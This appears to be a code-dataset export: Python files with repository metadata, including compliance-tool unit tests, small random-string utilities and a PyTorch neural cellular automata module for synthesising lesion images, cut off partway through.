self.assertEqual(Status.SUCCESS, manager.steps[2].status)
def test_check_deserialization(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_1 = os.path.join(script_dir, 'files/test_not_found.xml')
compliance_tool.check_deserialization(file_path_1, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.FAILED, manager.steps[0].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[1].status)
self.assertIn("No such file or directory", manager.format_step(0, verbose_level=1))
manager.steps = []
file_path_2 = os.path.join(script_dir, 'files/test_not_deserializable_aas.xml')
compliance_tool.check_deserialization(file_path_2, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertIn("child of aas:assetAdministrationShells", manager.format_step(1, verbose_level=1))
self.assertIn("doesn't match the expected tag aas:assetAdministrationShell",
manager.format_step(1, verbose_level=1))
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_deserializable_aas_warning.xml')
compliance_tool.check_deserialization(file_path_3, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertIn("ValueError: A revision requires a version", manager.format_step(1, verbose_level=1))
manager.steps = []
file_path_4 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_deserialization(file_path_4, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
manager.steps = []
file_path_4 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_deserialization(file_path_4, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
def test_check_aas_example(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_2 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
compliance_tool.check_aas_example(file_path_2, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
manager.steps = []
file_path_1 = os.path.join(script_dir, 'files/test_not_deserializable_aas.xml')
compliance_tool.check_aas_example(file_path_1, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[2].status)
self.assertIn("child of aas:assetAdministrationShells", manager.format_step(1, verbose_level=1))
self.assertIn("doesn't match the expected tag aas:assetAdministrationShell",
manager.format_step(1, verbose_level=1))
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_demo_full_example_wrong_attribute.xml')
compliance_tool.check_aas_example(file_path_3, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.FAILED, manager.steps[2].status)
self.assertIn('Asset administration shell AssetAdministrationShell[Identifier(IRI=https://acplt.org/'
'Test_AssetAdministrationShell)] must exist in given asset administrationshell list',
manager.format_step(2, verbose_level=1))
def test_check_xml_files_equivalence(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_1 = os.path.join(script_dir, 'files/test_not_deserializable_aas.xml')
file_path_2 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_xml_files_equivalence(file_path_1, file_path_2, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[4].status)
manager.steps = []
compliance_tool.check_xml_files_equivalence(file_path_2, file_path_1, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.FAILED, manager.steps[3].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[4].status)
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
file_path_4 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
compliance_tool.check_xml_files_equivalence(file_path_3, file_path_4, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.SUCCESS, manager.steps[4].status)
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
file_path_4 = os.path.join(script_dir, 'files/test_demo_full_example_wrong_attribute.xml')
compliance_tool.check_xml_files_equivalence(file_path_3, file_path_4, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.FAILED, manager.steps[4].status)
manager.steps = []
compliance_tool.check_xml_files_equivalence(file_path_4, file_path_3, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.FAILED, manager.steps[4].status)
self.assertIn('Asset administration shell AssetAdministrationShell[Identifier(IRI=https://acplt.org/'
'Test_AssetAdministrationShell)] must exist in given asset administrationshell list',
manager.format_step(4, verbose_level=1))
| 54.884615 | 113 | 0.712284 | 1,271 | 9,989 | 5.397325 | 0.088906 | 0.150437 | 0.171429 | 0.163265 | 0.914286 | 0.914286 | 0.909475 | 0.882653 | 0.877114 | 0.873178 | 0 | 0.016366 | 0.174192 | 9,989 | 181 | 114 | 55.187845 | 0.81525 | 0.021924 | 0 | 0.75817 | 0 | 0 | 0.121581 | 0.068012 | 0 | 0 | 0 | 0 | 0.535948 | 1 | 0.026144 | false | 0 | 0.026144 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
64a98181d44f28dd2971020bcbaf25452ead0b83 | 41 | py | Python | develop/src/rawdata_builder/__init__.py | pjw960408/binance-trader-c1 | dae91cc721591257334ab1ddcf3a4f6d86644435 | [
"MIT"
] | null | null | null | develop/src/rawdata_builder/__init__.py | pjw960408/binance-trader-c1 | dae91cc721591257334ab1ddcf3a4f6d86644435 | [
"MIT"
] | null | null | null | develop/src/rawdata_builder/__init__.py | pjw960408/binance-trader-c1 | dae91cc721591257334ab1ddcf3a4f6d86644435 | [
"MIT"
] | 1 | 2021-05-06T14:14:56.000Z | 2021-05-06T14:14:56.000Z | from .build_rawdata import build_rawdata
| 20.5 | 40 | 0.878049 | 6 | 41 | 5.666667 | 0.666667 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b3c9f85c92e0d95e7e5a588eda50f835acc4bb85 | 250 | py | Python | src/lqc/generate/css/util/integer.py | tysmith/layout-quickcheck | c5ba9431a40f650a594140541e32af7c8ff21695 | [
"MIT"
] | 2 | 2021-03-05T19:00:21.000Z | 2021-03-15T18:23:04.000Z | src/lqc/generate/css/util/integer.py | tysmith/layout-quickcheck | c5ba9431a40f650a594140541e32af7c8ff21695 | [
"MIT"
] | 7 | 2021-03-05T19:10:28.000Z | 2021-10-20T19:26:18.000Z | src/lqc/generate/css/util/integer.py | tysmith/layout-quickcheck | c5ba9431a40f650a594140541e32af7c8ff21695 | [
"MIT"
] | 1 | 2021-09-27T18:56:34.000Z | 2021-09-27T18:56:34.000Z | from random import choice, randint
MAX_NUMBER = 2000
prefixes = ["", "+", "-"]
def generate_prefix():
return choice(prefixes)
def generate():
prefix = generate_prefix()
number = randint(0, MAX_NUMBER)
return f"{prefix}{number}"
| 15.625 | 35 | 0.656 | 29 | 250 | 5.517241 | 0.517241 | 0.2625 | 0.2375 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0.2 | 250 | 15 | 36 | 16.666667 | 0.775 | 0 | 0 | 0 | 1 | 0 | 0.072 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0.111111 | 0.555556 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
b3dc459c21a7e820048a88c7737092ffc6888b22 | 407 | py | Python | name building software.py | Ayush2007A/Code-master | fafe4a020adc3f8e78c78f6b8b2b08b5c3005613 | [
"Unlicense"
] | 1 | 2021-02-05T10:29:30.000Z | 2021-02-05T10:29:30.000Z | name building software.py | Ayush2007A/Code-master | fafe4a020adc3f8e78c78f6b8b2b08b5c3005613 | [
"Unlicense"
] | null | null | null | name building software.py | Ayush2007A/Code-master | fafe4a020adc3f8e78c78f6b8b2b08b5c3005613 | [
"Unlicense"
] | null | null | null | import random
s_letters=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
c_letters=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
print(random.choice(c_letters)+random.choice(s_letters)+random.choice(s_letters)+random.choice(s_letters)+random.choice(s_letters)+random.choice(s_letters))
| 81.4 | 157 | 0.523342 | 83 | 407 | 2.46988 | 0.373494 | 0.234146 | 0.463415 | 0.487805 | 0.843902 | 0.843902 | 0.843902 | 0.843902 | 0.843902 | 0.843902 | 0 | 0 | 0.022113 | 407 | 4 | 158 | 101.75 | 0.515075 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
377f8e0bfe1df5b5e5aa7b62ab4b9ca25f265b69 | 41,130 | py | Python | c19_synthesis/cellular_automata.py | octaviomtz/nbdev_c19_synthesis | 45079757af6c05c3763d5c7147f566862171de9b | [
"Apache-2.0"
] | null | null | null | c19_synthesis/cellular_automata.py | octaviomtz/nbdev_c19_synthesis | 45079757af6c05c3763d5c7147f566862171de9b | [
"Apache-2.0"
] | null | null | null | c19_synthesis/cellular_automata.py | octaviomtz/nbdev_c19_synthesis | 45079757af6c05c3763d5c7147f566862171de9b | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_cellular_automata.ipynb (unless otherwise specified).
__all__ = ['to_rgb', 'correct_label_in_plot', 'create_sobel_and_identity', 'prepare_seed', 'epochs_in_inner_loop',
'ca_model_baseline', 'ca_model_perception', 'plot_loss_and_lesion_synthesis', 'ca_model_perception_clamp',
'ca_model_step_size', 'CeA_00', 'ca_model_laplacian_regularizer', 'ca_model_l2reg']
# Cell
import cv2
import torch
import numpy as np
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import matplotlib.pyplot as plt
from IPython.display import Image, HTML, clear_output
import matplotlib
import io
import sys
# Cell
def to_rgb(img, channel=1):
'''return visible channel'''
# rgb, a = img[:,:,:1], img[:,:,1:2]
rgb, a = img[:,:,:channel], img[:,:,channel:channel+1]
return 1.0-a+rgb
# Cell
def correct_label_in_plot(model):
'''get a string with the network architecture to print in the figure'''
# https://www.kite.com/python/answers/how-to-redirect-print-output-to-a-variable-in-python
old_stdout = sys.stdout
new_stdout = io.StringIO()
sys.stdout = new_stdout
print(model);
output = new_stdout.getvalue()
sys.stdout = old_stdout
model_str = [i.split(', k')[0] for i in output.split('\n')]
model_str_layers = [i.split(':')[-1] for i in model_str[2:-3]]
model_str = [model_str[0]]+model_str_layers
model_str = str(model_str).replace("', '",'\n')
return model_str
# Cell
def create_sobel_and_identity(device='cuda'):
ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
return ident, sobel_x, lap
# Cell
def prepare_seed(target, this_seed, device, num_channels = 16, pool_size = 1024):
# prepare seed
height, width, _ = np.shape(target)
seed = np.zeros([1, height, width, num_channels], np.float32)
for i in range(num_channels-1):
seed[:,..., i+1] = this_seed
# Preparing the seed pool
seed_tensor = torch.tensor(seed).permute(0,-1,1,2).to(device)
seed_pool = torch.repeat_interleave(seed_tensor, repeats = pool_size, dim = 0)
return seed, seed_tensor, seed_pool
# Cell
def epochs_in_inner_loop(i, inner_iter_aux=0, inner_iter=0, thresh_do_nothing=100, thresh_do_something=200, increase=10, inner_iter_max=100):
if i < thresh_do_nothing:
inner_iter = 100
elif i % thresh_do_something == 0:
inner_iter_aux = inner_iter_aux + increase
inner_iter = np.min([inner_iter_aux, inner_iter_max])
else:
inner_iter=inner_iter
return inner_iter, inner_iter_aux
# Cell
class ca_model_baseline(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda'):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_baseline, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
the loss is calculated for only the first 4 channels of the output
'''
x = seed
for i in range(epochs_inside):
x, alive_mask = self.forward(x)
target_loss = target_loss_func(x[:,:2, :,:], target) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
alive_mask = self.get_alive_mask(x)
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
y = self.perception(x)
out = x + self.model(y)*mask
out *= alive_mask
return out, alive_mask
# Cell
class ca_model_perception(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda'):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_perception, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, iters, current_epoch = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
the loss is calculated for only the first 4 channels of the output
'''
x = seed
for i in range(iters):
x, alive_mask = self.forward(x,i, current_epoch)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, i, current_epoch):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
if current_epoch < 100:
alive_mask = self.get_alive_mask(x)
else:
if i % 3 == 0:
alive_mask = self.get_alive_mask(x)
else:
# alive_mask = self.get_alive_mask(x)
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
y = self.perception(x)
out = x + self.model(y)*mask
out *= alive_mask
return out, alive_mask
# Cell
def plot_loss_and_lesion_synthesis(losses, optimizer, model_str, i, loss, sample_size, out):
clear_output(True)
f, (ax0, ax1) = plt.subplots(2, 1, figsize=(12,10), gridspec_kw={'height_ratios': [4, 1]})
lr_info = f'\nlr_init={optimizer.param_groups[0]["initial_lr"]:.1E}\nlr_last={optimizer.param_groups[0]["lr"]:.1E}'
model_str_final = model_str+lr_info
ax0.plot(losses, label=model_str_final)
ax0.set_yscale('log')
ax0.legend(loc='upper right', fontsize=16)
stack = []
for z in range(sample_size):
stack.append(to_rgb(out[z].permute(-2, -1,0).cpu().detach().numpy()))
ax1.imshow(np.clip(np.hstack(np.squeeze(stack)), 0,1))
ax1.axis('off')
plt.show()
print(i, loss.item(), flush = True)
return model_str_final
# Cell
class ca_model_perception_clamp(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda'):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_perception_clamp, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, iters, current_epoch = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
the loss is calculated for only the first 4 channels of the output
'''
x = seed
for i in range(iters):
x, alive_mask, mask_diff = self.forward(x,i, current_epoch)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy(), mask_diff.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, i, current_epoch):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
if current_epoch < 100:
alive_mask = self.get_alive_mask(x)
else:
if i % 3 == 0:
alive_mask = self.get_alive_mask(x)
else:
# alive_mask = self.get_alive_mask(x)
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_diff = alive_mask - mask_previous
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
y = self.perception(x)
mask_new_cells_clamped = torch.clip((1-mask_diff)+.19,0,1) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
for i in np.arange(1,16,1):
mask_new_cells_clamped2[:,i,:,:] = mask_new_cells_clamped_ones
out = x + self.model(y)*mask*mask_new_cells_clamped2
out *= alive_mask
return out, alive_mask, mask_diff
# Cell
class ca_model_step_size(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_step_size, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, iters, current_epoch = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
the loss is calculated for only the first 4 channels of the output
'''
x = seed
for i in range(iters):
x, alive_mask, other_mask = self.forward(x,i, current_epoch)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
